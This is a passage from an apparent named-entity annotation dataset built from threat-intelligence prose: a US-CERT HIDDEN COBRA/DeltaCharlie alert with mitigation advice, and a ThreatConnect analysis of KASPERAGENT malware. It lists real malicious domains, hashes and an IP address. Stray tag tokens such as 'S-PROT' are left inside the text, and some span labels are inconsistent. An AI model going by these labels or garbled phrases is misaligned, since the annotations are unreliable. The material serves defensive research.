"end": 165, "label": "Organization"}]} {"text": "This alert provides technical details on the tools and infrastructure used by cyber actors of the North Korean government to target the media , aerospace , financial , and critical infrastructure sectors in the United States and globally .", "spans": []} {"text": "Working with U.S. 
Government partners , DHS and FBI identified Internet Protocol ( IP ) addresses associated with a malware variant , known as DeltaCharlie , used to manage North Korea 's distributed denial-of-service ( DDoS ) botnet infrastructure .", "spans": [{"start": 18, "end": 28, "label": "Organization"}, {"start": 40, "end": 43, "label": "Organization"}, {"start": 48, "end": 51, "label": "Organization"}, {"start": 63, "end": 80, "label": "Indicator"}, {"start": 83, "end": 85, "label": "Indicator"}, {"start": 143, "end": 155, "label": "Malware"}, {"start": 227, "end": 248, "label": "System"}]} {"text": "This alert contains indicators of compromise ( IOCs ) , malware descriptions , network signatures , and host-based rules to help network defenders detect activity conducted by the North Korean B-IDTY E-LOC government .", "spans": [{"start": 20, "end": 44, "label": "System"}, {"start": 47, "end": 51, "label": "System"}]} {"text": "The U.S. Government refers to the malicious cyber activity by the North Korean government as HIDDEN COBRA .", "spans": [{"start": 9, "end": 19, "label": "Organization"}, {"start": 79, "end": 89, "label": "Organization"}, {"start": 93, "end": 105, "label": "Organization"}]} {"text": "For more information related to HIDDEN COBRA activity , go to https://www.us-cert.gov/hiddencobra .", "spans": [{"start": 32, "end": 44, "label": "Organization"}, {"start": 62, "end": 97, "label": "Indicator"}]} {"text": "If users or administrators detect the custom tools indicative of HIDDEN COBRA , these tools should be immediately flagged , reported to the DHS National Cybersecurity Communications and Integration Center ( NCCIC ) or the FBI Cyber Watch ( CyWatch ) , and given highest priority for enhanced mitigation .", "spans": [{"start": 65, "end": 77, "label": "Organization"}, {"start": 140, "end": 143, "label": "Organization"}, {"start": 144, "end": 204, "label": "Organization"}, {"start": 207, "end": 212, "label": "Organization"}, {"start": 222, "end": 225, 
"label": "Organization"}]} {"text": "This alert identifies IP S-PROT addresses linked to systems infected with DeltaCharlie malware and provides descriptions of the malware and associated malware signatures .", "spans": [{"start": 22, "end": 41, "label": "System"}, {"start": 74, "end": 86, "label": "Malware"}]} {"text": "DHS and FBI are distributing these IP S-PROT addresses to enable network defense activities and reduce exposure to the DDoS command-and-control network .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 8, "end": 11, "label": "Organization"}, {"start": 35, "end": 54, "label": "System"}]} {"text": "FBI has high confidence that HIDDEN COBRA actors are using the IP S-PROT addresses for further network exploitation .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 29, "end": 41, "label": "Organization"}, {"start": 63, "end": 82, "label": "System"}]} {"text": "This alert includes technical indicators related to specific North Korean government cyber operations and provides suggested response actions to those indicators , recommended mitigation techniques , and information on reporting incidents to the U.S. 
Government .", "spans": [{"start": 74, "end": 84, "label": "Organization"}, {"start": 251, "end": 261, "label": "Organization"}]} {"text": "On August 23 , 2017 , DHS published a Malware Analysis Report ( MAR-10132963 ) that examines malware functionality to provide detailed code analysis and insight into specific tactics , techniques , and procedures ( TTPs ) observed in the malware .", "spans": [{"start": 22, "end": 25, "label": "Organization"}]} {"text": "Since 2009 , HIDDEN COBRA actors have leveraged their capabilities to target and compromise a range of victims ; some intrusions have resulted in the Exfiltration of data while others have been disruptive in nature .", "spans": [{"start": 13, "end": 25, "label": "Organization"}]} {"text": "Commercial reporting has referred to this activity as Lazarus Group and Guardians of Peace .", "spans": [{"start": 54, "end": 61, "label": "Organization"}, {"start": 72, "end": 90, "label": "Organization"}]} {"text": "DHS and FBI assess that HIDDEN COBRA actors will continue to use cyber operations to advance their government 's military and strategic objectives .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 8, "end": 11, "label": "Organization"}, {"start": 24, "end": 36, "label": "Organization"}]} {"text": "Cyber analysts are encouraged to review the information provided in this alert to detect signs of malicious network activity .", "spans": []} {"text": "Tools and capabilities used by HIDDEN COBRA actors include DDoS botnet S-ACTs , keyloggers , remote access tools ( RATs ) , and wiper malware .", "spans": [{"start": 31, "end": 43, "label": "Organization"}, {"start": 59, "end": 77, "label": "System"}, {"start": 80, "end": 90, "label": "System"}, {"start": 93, "end": 112, "label": "System"}, {"start": 115, "end": 119, "label": "System"}, {"start": 128, "end": 133, "label": "Malware"}]} {"text": "Variants of malware and tools used by HIDDEN COBRA actors include Destover , Wild Positron E-MAL/Duuzer , 
and Hangman .", "spans": [{"start": 38, "end": 50, "label": "Organization"}, {"start": 66, "end": 74, "label": "Malware"}, {"start": 77, "end": 81, "label": "Malware"}, {"start": 82, "end": 103, "label": "Malware"}, {"start": 110, "end": 117, "label": "Malware"}]} {"text": "DHS has previously released Alert TA14-353A , which contains additional details on the use of a server message block ( SMB ) worm tool employed by these actors .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 96, "end": 116, "label": "Indicator"}, {"start": 119, "end": 122, "label": "Indicator"}, {"start": 125, "end": 129, "label": "Malware"}]} {"text": "Further research is needed to understand the full breadth of this group 's cyber capabilities .", "spans": []} {"text": "In particular , DHS recommends that more research should be conducted on the North Korean cyber activity that has been reported by cybersecurity and threat research firms .", "spans": [{"start": 16, "end": 19, "label": "Organization"}]} {"text": "HIDDEN COBRA actors commonly target systems running older , unsupported versions of Microsoft operating systems .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 84, "end": 93, "label": "Organization"}]} {"text": "The multiple vulnerabilities in these older systems provide cyber actors many targets for exploitation .", "spans": []} {"text": "These actors have also used Adobe Flash player vulnerabilities to gain initial entry into users' environments .", "spans": [{"start": 28, "end": 33, "label": "Organization"}, {"start": 34, "end": 46, "label": "System"}]} {"text": "HIDDEN COBRA is known to use vulnerabilities affecting various applications .", "spans": [{"start": 0, "end": 12, "label": "Organization"}]} {"text": "These vulnerabilities include :", "spans": []} {"text": "CVE-2015-6585 : Hangul Word Processor Vulnerability .", "spans": [{"start": 0, "end": 13, "label": "Vulnerability"}, {"start": 16, "end": 37, "label": "System"}]} 
{"text": "CVE-2015-8651 : Adobe Flash Player 18.0.0.324 and 19.x Vulnerability .", "spans": [{"start": 0, "end": 13, "label": "Vulnerability"}, {"start": 16, "end": 34, "label": "System"}]} {"text": "CVE-2016-0034 : Microsoft Silverlight 5.1.41212.0 Vulnerability .", "spans": [{"start": 0, "end": 13, "label": "Vulnerability"}, {"start": 16, "end": 37, "label": "System"}]} {"text": "CVE-2016-1019 : Adobe Flash Player 21.0.0.197 Vulnerability .", "spans": [{"start": 0, "end": 13, "label": "Vulnerability"}, {"start": 16, "end": 34, "label": "System"}]} {"text": "CVE-2016-4117 : Adobe Flash Player 21.0.0.226 Vulnerability .", "spans": [{"start": 0, "end": 13, "label": "Vulnerability"}, {"start": 16, "end": 34, "label": "System"}]} {"text": "DHS recommends that organizations upgrade these applications to the latest version and patch level .", "spans": [{"start": 0, "end": 3, "label": "Organization"}]} {"text": "If Adobe Flash or Microsoft Silverlight is no longer required , DHS recommends that those applications be removed from systems .", "spans": [{"start": 3, "end": 8, "label": "Organization"}, {"start": 9, "end": 14, "label": "System"}, {"start": 18, "end": 27, "label": "Organization"}, {"start": 28, "end": 39, "label": "System"}, {"start": 64, "end": 67, "label": "Organization"}]} {"text": "The IOCs provided with this alert include IP S-PROT addresses determined to be part of the HIDDEN COBRA botnet infrastructure , identified as DeltaCharlie .", "spans": [{"start": 4, "end": 8, "label": "System"}, {"start": 42, "end": 61, "label": "System"}, {"start": 91, "end": 103, "label": "Organization"}, {"start": 104, "end": 110, "label": "System"}, {"start": 142, "end": 154, "label": "Malware"}]} {"text": "The DeltaCharlie DDoS bot was originally reported by Novetta in their 2016 Operation Blockbuster Malware Report .", "spans": [{"start": 4, "end": 16, "label": "Malware"}, {"start": 22, "end": 25, "label": "System"}, {"start": 53, "end": 60, "label": "Organization"}]} 
{"text": "This malware has used the IP S-PROT addresses identified in the accompanying .csv and .stix files as both source and destination IPs .", "spans": [{"start": 26, "end": 45, "label": "System"}, {"start": 77, "end": 81, "label": "Indicator"}, {"start": 86, "end": 91, "label": "Indicator"}, {"start": 129, "end": 132, "label": "System"}]} {"text": "In some instances , the malware may have been present on victims' networks for a significant period .", "spans": []} {"text": "DeltaCharlie is a DDoS tool used by HIDDEN COBRA actors , and is referenced and detailed in Novetta 's Operation Blockbuster Destructive Malware report .", "spans": [{"start": 0, "end": 12, "label": "Malware"}, {"start": 36, "end": 48, "label": "Organization"}, {"start": 92, "end": 99, "label": "Organization"}]} {"text": "The information related to DeltaCharlie from the Operation Blockbuster Destructive Malware report should be viewed in conjunction with the IP S-PROT addresses listed in the .csv and .stix files provided within this alert .", "spans": [{"start": 27, "end": 39, "label": "Malware"}, {"start": 139, "end": 158, "label": "System"}, {"start": 173, "end": 177, "label": "Indicator"}, {"start": 182, "end": 187, "label": "Indicator"}]} {"text": "DeltaCharlie is a DDoS tool capable of launching Domain Name System ( DNS ) attacks , Network Time Protocol ( NTP ) attacks , and Carrier Grade NAT ( CGN ) attacks .", "spans": [{"start": 0, "end": 12, "label": "Malware"}, {"start": 49, "end": 67, "label": "System"}, {"start": 70, "end": 73, "label": "System"}, {"start": 86, "end": 107, "label": "Indicator"}, {"start": 110, "end": 113, "label": "Indicator"}, {"start": 130, "end": 147, "label": "System"}, {"start": 150, "end": 153, "label": "System"}]} {"text": "The malware operates on victims' systems as a svchost-based service and is capable of downloading executables , changing its own configuration , updating its own binaries , terminating its own processes , and activating and terminating 
denial-of-service attacks .", "spans": []} {"text": "HIDDEN COBRA IOCs related to DeltaCharlie are provided within the accompanying .csv and .stix files of this alert .", "spans": [{"start": 0, "end": 12, "label": "Organization"}, {"start": 13, "end": 17, "label": "System"}, {"start": 29, "end": 41, "label": "Malware"}, {"start": 79, "end": 83, "label": "Indicator"}, {"start": 88, "end": 93, "label": "Indicator"}]} {"text": "DHS and FBI recommend that network administrators review the IP S-PROT addresses , file hashes , network signatures , and YARA rules provided , and add the IPs to their watchlist to determine whether malicious activity has been observed within their organization .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 8, "end": 11, "label": "Organization"}, {"start": 61, "end": 80, "label": "System"}, {"start": 83, "end": 94, "label": "System"}, {"start": 97, "end": 115, "label": "System"}, {"start": 122, "end": 126, "label": "System"}, {"start": 156, "end": 159, "label": "System"}]} {"text": "When reviewing network perimeter logs for the IP S-PROT addresses , organizations may find numerous instances of these IP S-PROT addresses attempting to connect to their systems .", "spans": [{"start": 46, "end": 65, "label": "System"}, {"start": 119, "end": 138, "label": "System"}]} {"text": "Upon reviewing the traffic from these IP S-PROT addresses , system owners may find that some traffic corresponds to malicious activity and some to legitimate activity .", "spans": [{"start": 38, "end": 57, "label": "System"}, {"start": 60, "end": 66, "label": "System"}]} {"text": "System owners are also advised to run the YARA tool on any system they suspect to have been targeted by HIDDEN COBRA actors .", "spans": [{"start": 0, "end": 6, "label": "System"}, {"start": 42, "end": 46, "label": "System"}, {"start": 59, "end": 65, "label": "System"}, {"start": 104, "end": 116, "label": "Organization"}]} {"text": "This section contains network signatures 
and host-based rules that can be used to detect malicious activity associated with HIDDEN COBRA actors .", "spans": [{"start": 22, "end": 40, "label": "System"}, {"start": 45, "end": 61, "label": "System"}, {"start": 124, "end": 136, "label": "Organization"}]} {"text": "Although created using a comprehensive vetting process , the possibility of false positives always remains .", "spans": []} {"text": "These signatures and rules should be used to supplement analysis and should not be used as a sole source of attributing this activity to HIDDEN COBRA actors .", "spans": [{"start": 137, "end": 149, "label": "Organization"}]} {"text": "A successful network intrusion can have severe impacts , particularly if the compromise becomes public and sensitive information is exposed .", "spans": []} {"text": "Possible impacts include : temporary or permanent loss of sensitive or proprietary information , disruption to regular operations , financial losses incurred to restore systems and files , and potential harm to an organization 's reputation .", "spans": []} {"text": "Network administrators are encouraged to apply the following recommendations , which can prevent as many as 85 percent of targeted cyber intrusions .", "spans": []} {"text": "The mitigation strategies provided may seem like common sense .", "spans": []} {"text": "However , many organizations fail to use these basic security measures , leaving their systems open to compromise :", "spans": []} {"text": "Patch applications and operating systems .", "spans": []} {"text": "Most attackers target vulnerable applications and operating systems .", "spans": [{"start": 50, "end": 67, "label": "System"}]} {"text": "Ensuring that applications and operating systems are patched with the latest updates greatly reduces the number of exploitable entry points available to an attacker .", "spans": []} {"text": "Use best practices when updating software and patches by only downloading updates from authenticated vendor sites .", 
"spans": [{"start": 33, "end": 41, "label": "System"}, {"start": 46, "end": 53, "label": "System"}]} {"text": "Use application whitelisting .", "spans": []} {"text": "Whitelisting is one of the best security strategies because it allows only specified programs to run while blocking all others , including malicious software .", "spans": [{"start": 139, "end": 157, "label": "Malware"}]} {"text": "Restrict administrative privileges .", "spans": []} {"text": "Threat actors are increasingly focused on gaining control of legitimate credentials , especially credentials associated with highly privileged accounts .", "spans": []} {"text": "Reduce privileges to only those needed for a user 's duties .", "spans": []} {"text": "Separate administrators into privilege tiers with limited access to other tiers .", "spans": []} {"text": "Segment networks and segregate them into security zones .", "spans": []} {"text": "Segment networks into logical enclaves and restrict host-to-host communications paths .", "spans": []} {"text": "This helps protect sensitive information and critical services , and limits damage from network perimeter breaches .", "spans": []} {"text": "Validate input .", "spans": []} {"text": "Input validation is a method of sanitizing untrusted input provided by users of a web application .", "spans": []} {"text": "Implementing input validation can protect against the security flaws of web applications by significantly reducing the probability of successful exploitation .", "spans": []} {"text": "Types of attacks possibly averted include Structured Query Language ( SQL ) injection , cross-site scripting , and command injection .", "spans": []} {"text": "Use stringent file reputation settings .", "spans": []} {"text": "Tune the file reputation systems of your anti-virus software to the most aggressive setting possible .", "spans": []} {"text": "Some anti-virus products can limit execution to only the highest reputation files , stopping a wide range of untrustworthy 
code from gaining control .", "spans": []} {"text": "Understand firewalls .", "spans": [{"start": 11, "end": 20, "label": "System"}]} {"text": "Firewalls provide security to make your network less susceptible to attack .", "spans": [{"start": 0, "end": 9, "label": "System"}]} {"text": "They can be configured to block data and applications from certain locations ( IP S-PROT whitelisting ) , while allowing relevant and necessary data through .", "spans": [{"start": 79, "end": 101, "label": "System"}]} {"text": "To protect against code injections and other attacks , system operators should routinely evaluate known and published vulnerabilities , periodically perform software updates and technology refreshes , and audit external-facing systems for known web application vulnerabilities .", "spans": [{"start": 211, "end": 234, "label": "System"}]} {"text": "They should also take the following steps to harden both web applications and the servers hosting them to reduce the risk of network intrusion via this vector .", "spans": []} {"text": "Use and configure available firewalls to block attacks .", "spans": [{"start": 28, "end": 37, "label": "System"}]} {"text": "Take steps to secure Windows systems , such as installing and configuring Microsoft 's Enhanced Mitigation Experience Toolkit ( EMET ) and Microsoft AppLocker .", "spans": [{"start": 21, "end": 36, "label": "System"}, {"start": 74, "end": 83, "label": "Organization"}, {"start": 87, "end": 125, "label": "System"}, {"start": 128, "end": 132, "label": "System"}, {"start": 139, "end": 148, "label": "Organization"}, {"start": 149, "end": 158, "label": "System"}]} {"text": "Monitor and remove any unauthorized code present in any www directories .", "spans": []} {"text": "Disable , discontinue , or disallow the use of Internet Control Message Protocol ( ICMP ) and Simple Network Management Protocol ( SNMP ) as much as possible .", "spans": [{"start": 47, "end": 80, "label": "Indicator"}, {"start": 83, "end": 87, 
"label": "Indicator"}, {"start": 94, "end": 128, "label": "Indicator"}, {"start": 131, "end": 135, "label": "Indicator"}]} {"text": "Remove unnecessary HTTP verbs from web servers .", "spans": [{"start": 19, "end": 23, "label": "Indicator"}, {"start": 35, "end": 46, "label": "System"}]} {"text": "Typical web servers and applications only require GET , POST , and HEAD .", "spans": [{"start": 8, "end": 19, "label": "System"}]} {"text": "Where possible , minimize server fingerprinting by configuring web servers to avoid responding with banners identifying the server software and version number .", "spans": [{"start": 63, "end": 74, "label": "System"}]} {"text": "Secure both the operating system and the application .", "spans": []} {"text": "Update and patch production servers regularly .", "spans": []} {"text": "Disable potentially harmful SQL-stored procedure calls .", "spans": []} {"text": "Sanitize and validate input to ensure that it is properly typed and does not contain escaped code .", "spans": []} {"text": "Consider using type-safe stored procedures and prepared statements .", "spans": []} {"text": "Audit transaction logs regularly for suspicious activity .", "spans": []} {"text": "Perform penetration testing on web services .", "spans": [{"start": 31, "end": 43, "label": "System"}]} {"text": "Ensure error messages are generic and do not expose too much information .", "spans": []} {"text": "System operators should take the following steps to limit permissions , privileges , and access controls .", "spans": []} {"text": "Reduce privileges to only those needed for a user 's duties .", "spans": []} {"text": "Restrict users' ability ( permissions ) to install and run unwanted software applications , and apply the principle of Least Privilege to all systems and services .", "spans": [{"start": 119, "end": 134, "label": "System"}]} {"text": "Restricting these privileges may prevent malware from running or limit its capability to spread through the network .", 
"spans": []} {"text": "Carefully consider the risks before granting administrative rights to users on their own machines .", "spans": []} {"text": "Scrub and verify all administrator accounts regularly .", "spans": []} {"text": "Configure Group Policy to restrict all users to only one login session , where possible .", "spans": []} {"text": "Enforce secure network authentication , where possible .", "spans": []} {"text": "Instruct administrators to use non-privileged accounts for standard functions such as web browsing or checking webmail .", "spans": []} {"text": "Segment networks into logical enclaves and restrict host-to-host communication paths .", "spans": []} {"text": "Containment provided by enclaving also makes incident cleanup significantly less costly .", "spans": []} {"text": "Configure firewalls to disallow Remote Desktop Protocol ( RDP ) traffic coming from outside of the network boundary , except for in specific configurations such as when tunneled through a secondary virtual private network ( VPN ) with lower privileges .", "spans": [{"start": 32, "end": 55, "label": "Indicator"}, {"start": 58, "end": 61, "label": "Indicator"}, {"start": 198, "end": 221, "label": "System"}, {"start": 224, "end": 227, "label": "System"}]} {"text": "Audit existing firewall rules and close all ports that are not explicitly needed for business .", "spans": [{"start": 15, "end": 23, "label": "System"}]} {"text": "Specifically , carefully consider which ports should be connecting outbound versus inbound .", "spans": []} {"text": "Enforce a strict lockout policy for network users and closely monitor logs for failed login activity .", "spans": []} {"text": "Failed login activity can be indicative of failed intrusion activity .", "spans": []} {"text": "If remote access between zones is an unavoidable business need , log and monitor these connections closely .", "spans": []} {"text": "In environments with a high risk of interception or intrusion , organizations should consider 
supplementing password authentication with other forms of authentication such as challenge/response or multifactor authentication using biometric or physical tokens .", "spans": []} {"text": "System operators should follow these secure logging practices .", "spans": []} {"text": "Ensure event logging , including applications , events , login activities , and security attributes , is turned on or monitored for identification of security issues .", "spans": []} {"text": "Configure network logs to provide adequate information to assist in quickly developing an accurate determination of a security incident .", "spans": []} {"text": "Upgrade PowerShell to new versions with enhanced logging features and monitor the logs to detect usage of PowerShell commands , which are often malware-related .", "spans": [{"start": 8, "end": 18, "label": "System"}, {"start": 106, "end": 116, "label": "System"}]} {"text": "Secure logs in a centralized location and protect them from modification .", "spans": []} {"text": "Phantom of the Opaera :", "spans": []} {"text": "New KASPERAGENT Malware Campaign .", "spans": [{"start": 4, "end": 15, "label": "Malware"}]} {"text": "ThreatConnect has identified a KASPERAGENT malware campaign leveraging decoy Palestinian Authority documents .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 31, "end": 42, "label": "Malware"}, {"start": 77, "end": 98, "label": "Organization"}]} {"text": "The samples date from April \u2013 May 2017 , coinciding with the run up to the May 2017 Palestinian Authority elections .", "spans": [{"start": 84, "end": 105, "label": "Organization"}]} {"text": "Although we do not know who is behind the campaign , the decoy documents \u2019 content focuses on timely political issues in Gaza and the IP address hosting the campaign \u2019s command and control node hosts several other domains with Gaza registrants .", "spans": []} {"text": "In this blog post we will detail our analysis of the malware and 
associated indicators , look closely at the decoy files , and leverage available information to make an educated guess on the possible intended target .", "spans": []} {"text": "Associated indicators and screenshots of the decoy documents are all available here in the ThreatConnect platform .", "spans": [{"start": 91, "end": 104, "label": "Organization"}]} {"text": "Some of the indicators in the following post were published on AlienVault OTX on 6/13 .", "spans": [{"start": 63, "end": 73, "label": "Organization"}]} {"text": "KASPERAGENT is Microsoft Windows malware used in efforts targeting users in the United States , Israel , Palestinian Territories , and Egypt since July 2015 .", "spans": [{"start": 0, "end": 11, "label": "Malware"}, {"start": 15, "end": 24, "label": "Organization"}, {"start": 25, "end": 32, "label": "System"}]} {"text": "The malware was discovered by Palo Alto Networks Unit 42 and ClearSky Cyber Security , and publicized in April 2017 in the Targeted Attacks in the Middle East Using KASPERAGENT and MICROPSIA blog .", "spans": [{"start": 30, "end": 48, "label": "Organization"}, {"start": 49, "end": 56, "label": "Organization"}, {"start": 61, "end": 84, "label": "Organization"}, {"start": 165, "end": 176, "label": "Malware"}, {"start": 181, "end": 190, "label": "Malware"}]} {"text": "It is called KASPERAGENT based on PDB strings identified in the malware such as \u201c c : UsersUSADocumentsVisual Studio 2008ProjectsNew folder ( 2 ) kasperReleasekasper.pdb \u201d .", "spans": [{"start": 13, "end": 24, "label": "Malware"}, {"start": 82, "end": 169, "label": "Indicator"}]} {"text": "The threat actors used shortened URLs in spear phishing messages and fake news websites to direct targets to download KASPERAGENT .", "spans": [{"start": 118, "end": 129, "label": "Malware"}]} {"text": "Upon execution , KASPERAGENT drops the payload and a decoy document that displays Arabic names and ID numbers .", "spans": [{"start": 17, "end": 28, "label": "Malware"}]} 
{"text": "The malware establishes persistence and sends HTTP requests to the command and control domain mailsinfo.net .", "spans": [{"start": 46, "end": 50, "label": "Indicator"}, {"start": 94, "end": 107, "label": "Indicator"}]} {"text": "Of note , the callbacks were to PHP scripts that included / dad5 / in the URLs .", "spans": []} {"text": "Most samples of the malware reportedly function as a basic reconnaissance tool and downloader .", "spans": []} {"text": "However , some of the recently identified files display \u201c extended-capability \u201d", "spans": []} {"text": "including the functionality to steal passwords , take screenshots , log keystrokes , and steal files .", "spans": []} {"text": "These \u201c extended-capability \u201d", "spans": []} {"text": "samples called out to an additional command and control domain , stikerscloud.com .", "spans": [{"start": 65, "end": 81, "label": "Indicator"}]} {"text": "Additionally , early variants of KASPERAGENT used \u201c Chrome \u201d", "spans": [{"start": 33, "end": 44, "label": "Malware"}, {"start": 52, "end": 58, "label": "System"}]} {"text": "as the user agent , while more recent samples use \u201c OPAERA \u201d", "spans": []} {"text": "\u2013 a possible misspelling of the \u201c Opera \u201d", "spans": [{"start": 34, "end": 39, "label": "System"}]} {"text": "\u2013 browser .", "spans": []} {"text": "The indicators associated with the blog article are available in the ThreatConnect Technical Blogs and Reports source here .", "spans": [{"start": 69, "end": 82, "label": "Organization"}]} {"text": "The samples we identified leverage the same user agent string \u201c OPAERA \u201d", "spans": []} {"text": ", included the kasper PDB string reported by Unit 42 , and used similar POST and GET requests .", "spans": [{"start": 45, "end": 52, "label": "Organization"}]} {"text": "The command and control domains were different , and these samples used unique decoy documents to target their victims .", "spans": []} {"text": 
"We didn\u2019t start out looking for KASPERAGENT , but a file hit on one of our YARA rules for an executable designed to display a fake XLS icon \u2013 one way adversaries attempt to trick targets into thinking a malicious file is innocuous .", "spans": [{"start": 32, "end": 43, "label": "Malware"}]} {"text": "The first malicious sample we identified ( 6843AE9EAC03F69DF301D024BFDEFC88 ) had the file name \u201c testproj.exe \u201d", "spans": [{"start": 43, "end": 75, "label": "Indicator"}, {"start": 98, "end": 110, "label": "Indicator"}]} {"text": "and was identified within an archive file ( 4FE7561F63A71CA73C26CB95B28EAEE8 ) with the name \u201c \u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644 \u0627\u0644\u0643\u0627\u0645\u0644\u0629 \u0644\u0623\u063a\u062a\u064a\u0627\u0644 \u0641\u0642\u0647\u0627\u0621.r24 \u201d .", "spans": [{"start": 44, "end": 76, "label": "Indicator"}, {"start": 95, "end": 129, "label": "Indicator"}]} {"text": "This translates to \u201c The Complete Details of Fuqaha \u2019s Assassination \u201d", "spans": []} {"text": ", a reference to Hamas military leader Mazen Fuqaha who was assassinated on March 24 , 2017 .", "spans": [{"start": 17, "end": 22, "label": "Organization"}]} {"text": "We detonated the file in VxStream \u2019s automated malware analysis capability and found testproj.exe dropped a benign Microsoft Word document that pulls a jpg file from treestower.com .", "spans": [{"start": 25, "end": 33, "label": "System"}, {"start": 85, "end": 97, "label": "Indicator"}, {"start": 115, "end": 124, "label": "Organization"}, {"start": 125, "end": 129, "label": "System"}, {"start": 166, "end": 180, "label": "Indicator"}]} {"text": "Malwr.com observed this site in association with another sample that called out to mailsinfo.net \u2013 a host identified in the Targeted Attacks in the Middle East Using KASPERAGENT and MICROPSIA blog .", "spans": [{"start": 0, "end": 9, "label": "Indicator"}, {"start": 83, "end": 96, "label": "Indicator"}, 
{"start": 166, "end": 177, "label": "Malware"}, {"start": 182, "end": 191, "label": "Malware"}]} {"text": "That was our first hint that we were looking at KASPERAGENT .", "spans": [{"start": 48, "end": 59, "label": "Malware"}]} {"text": "The jpg pulled from treestower.com displays a graphic picture of a dead man , which also appeared on a Palestinian news website discussing the death of Hamas military leader Mazen Fuqaha .", "spans": [{"start": 20, "end": 34, "label": "Indicator"}, {"start": 152, "end": 157, "label": "Organization"}]} {"text": "A separate malicious executable \u2013 2DE25306A58D8A5B6CBE8D5E2FC5F3C5 ( vlc.exe ) \u2013 runs when the photograph is displayed , using the YouTube icon and calling out to several URLs on windowsnewupdates.com .", "spans": [{"start": 34, "end": 66, "label": "Indicator"}, {"start": 69, "end": 76, "label": "Indicator"}, {"start": 131, "end": 143, "label": "System"}, {"start": 179, "end": 200, "label": "Indicator"}]} {"text": "This host was registered in late March and appears to be unique to this campaign .", "spans": []} {"text": "With our interest piqued , we pivoted on the import hashes ( also known as an imphash ) , which captures the import table of a given file .", "spans": []} {"text": "Shared import hashes across multiple files would likely identify files that are part of the same malware family .", "spans": []} {"text": "We found nine additional samples sharing the imphash values for the two executables , C66F88D2D76D79210D568D7AD7896B45 and DCF3AA484253068D8833C7C5B019B07 .", "spans": [{"start": 86, "end": 118, "label": "Indicator"}, {"start": 123, "end": 154, "label": "Indicator"}]} {"text": "Analysis of those files uncovered two more imphashes , 0B4E44256788783634A2B1DADF4F9784 and E44F0BD2ADFB9CBCABCAD314D27ACCFC , for a total of 20 malicious files .", "spans": [{"start": 55, "end": 87, "label": "Indicator"}, {"start": 92, "end": 124, "label": "Indicator"}]} {"text": "These additional samples behaved similarly to 
the initial files ;", "spans": []} {"text": "testproj.exe dropped benign decoy files and started malicious executables .", "spans": [{"start": 0, "end": 12, "label": "Indicator"}]} {"text": "The malicious executables all called out to the same URLs on windowsnewupdates.com .", "spans": [{"start": 61, "end": 82, "label": "Indicator"}]} {"text": "These malware samples leverage the user agent string \u201c OPAERA \u201d , the same one identified in the Targeted Attacks in the Middle East Using KASPERAGENT and MICROPSIA blog .", "spans": [{"start": 139, "end": 150, "label": "Malware"}, {"start": 155, "end": 164, "label": "Malware"}]} {"text": "Although the command and control domain was different from those in the report , the POST and GET requests were similar and included / dad5 / in the URL string .", "spans": []} {"text": "In addition , the malware samples included the kasper PDB string reported by Unit 42 , prompting us to conclude that we were likely looking at new variants of KASPERAGENT .", "spans": [{"start": 77, "end": 84, "label": "Organization"}, {"start": 159, "end": 170, "label": "Malware"}]} {"text": "Several of the decoy files appeared to be official documents associated with the Palestinian Authority \u2013 the body that governs the Palestinian Territories in the Middle East .", "spans": [{"start": 81, "end": 102, "label": "Organization"}]} {"text": "We do not know whether the files are legitimate Palestinian Authority documents , but they are designed to look official .", "spans": [{"start": 48, "end": 69, "label": "Organization"}]} {"text": "Additionally , most of the decoy files are publicly available on news websites or social media .", "spans": []} {"text": "The first document \u2013 dated April 10 , 2017 \u2013 is marked \u201c Very Secret \u201d", "spans": []} {"text": "and addressed to Yahya Al-Sinwar , who Hamas elected as its leader in Gaza in February 2017 .", "spans": [{"start": 39, "end": 44, "label": "Organization"}]} {"text": "Like the 
photo displayed in the first decoy file we found , this document references the death of Mazen Fuqaha .", "spans": []} {"text": "The Arabic-language text and English translation of the document are available in ThreatConnect here .", "spans": [{"start": 82, "end": 95, "label": "Organization"}]} {"text": "A screenshot of the file is depicted below .", "spans": []} {"text": "The second legible file , dated April 23 , has the same letterhead and also is addressed to Yahya al-Sinwar .", "spans": []} {"text": "This file discusses the supposed announcement banning the rival Fatah political party , which controls the West Bank , from Gaza .", "spans": [{"start": 64, "end": 69, "label": "Organization"}]} {"text": "It mentions closing the Fatah headquarters and houses that were identified as meeting places as well as the arrest of some members of the party .", "spans": [{"start": 24, "end": 29, "label": "Organization"}]} {"text": "We don\u2019t know for sure who is responsible for this campaign , but digging into the passive DNS results led us to some breadcrumbs .", "spans": [{"start": 91, "end": 94, "label": "Indicator"}]} {"text": "Starting with 195.154.110.237 , the IP address which is hosting the command and control domain windowsnewupdates.com , we found that the host is on a dedicated server .", "spans": [{"start": 14, "end": 29, "label": "Indicator"}, {"start": 95, "end": 116, "label": "Indicator"}]} {"text": "Using our Farsight DNSDB integration , we identified other domains currently and previously hosted on the same IP .", "spans": [{"start": 10, "end": 18, "label": "Organization"}, {"start": 19, "end": 24, "label": "System"}]} {"text": "Two of the four domains that have been hosted at this IP since 2016 \u2014 upfile2box.com and 7aga.net \u2014 were registered by a freelance web developer in Gaza , Palestine .", "spans": [{"start": 70, "end": 84, "label": "Indicator"}, {"start": 89, "end": 97, "label": "Indicator"}]} {"text": "This IP has been used to host a 
small number of domains , some of which were registered by the same actor , suggesting the IP is dedicated for a single individual or group \u2019s use .", "spans": []} {"text": "While not conclusive , it is intriguing that the same IP was observed hosting a domain ostensibly registered in Gaza AND the command and control domain associated with a series of targeted attacks leveraging Palestinian Authority -themed decoy documents referencing Gaza .", "spans": [{"start": 208, "end": 229, "label": "Organization"}]} {"text": "Just like we can\u2019t make a definitive determination as to who conducted this campaign , we do not know for sure who it was intended to target .", "spans": []} {"text": "What we do know is that several of the malicious files were submitted to a public malware analysis site from the Palestinian Territories .", "spans": []} {"text": "This tells us that it is possible either the threat actors or at least one of the targets is located in that area .", "spans": []} {"text": "Additionally , as previously mentioned , the decoy document subject matter would likely be of interest to a few different potential targets in the Palestinian Territories .", "spans": []} {"text": "Potential targets such as Hamas who controls the Gaza strip and counts Mazen Fuqaha and Yahya al-Sinwar as members , 